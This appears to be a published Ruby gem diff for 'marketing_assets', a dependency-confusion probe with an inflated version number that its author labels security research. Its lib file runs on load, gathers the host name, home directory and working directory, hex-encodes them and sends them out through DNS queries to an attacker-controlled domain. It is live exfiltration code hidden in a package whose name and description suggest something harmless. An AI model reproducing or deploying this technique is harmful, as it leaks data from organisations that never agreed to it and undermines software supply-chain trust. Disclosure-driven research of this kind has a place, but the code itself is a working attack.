marketing_assets 2300.4.2

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 0b2b37f7a232bc3b767792a28e8c83f7ad2ccc4416702492a0a836cf98fbf482
+  data.tar.gz: 4d8f0968f1690361ffb08d34f68b95d8dd60415d887bcbf9317cbab7a4c255b6
+SHA512:
+  metadata.gz: 6bc878012ca7c74c11d42fc558f27e5aec9055eab6e2b15efc0602375ba000f5791068882852de3d4e215f30767d89a7f7c180dc5d7d1a4115ad144c7afeb3f0
+  data.tar.gz: c68b56e649630fad9c046c735d638c2be292e4b016ff441252b28f3c001439786b5404bd556955ef891140e4fbb4e6463d8a4cbb12bb43ce78075d559a3fa963

data/lib/marketing_assets.rb

@@ -0,0 +1,64 @@
+
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+For any questions or suggestions:
+
+alex@ethicalhack.ro
+https://twitter.com/alxbrsn
+
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = '.dns.alexbirsan-hacks-paypal.com'
+ns = 'dns1.alexbirsan-hacks-paypal.com'
+
+package = 'marketing_assets'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd
+}
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '4.4.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new, 
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+    begin
+        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+
+    begin
+        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+end

metadata

@@ -0,0 +1,44 @@
+--- !ruby/object:Gem::Specification
+name: marketing_assets
+version: !ruby/object:Gem::Version
+  version: 2300.4.2
+platform: ruby
+authors:
+- Alex Birsan
+autorequire: 
+bindir: bin
+cert_chain: []
+date: 2020-09-14 00:00:00.000000000 Z
+dependencies: []
+description: This package is meant for security research purposes and does not contain
+  any useful code.
+email: alex@ethicalhack.ro
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- lib/marketing_assets.rb
+homepage: https://twitter.com/alxbrsn
+licenses:
+- MIT
+metadata: {}
+post_install_message: 
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.0.3
+signing_key: 
+specification_version: 4
+summary: Security research purposes only
+test_files: []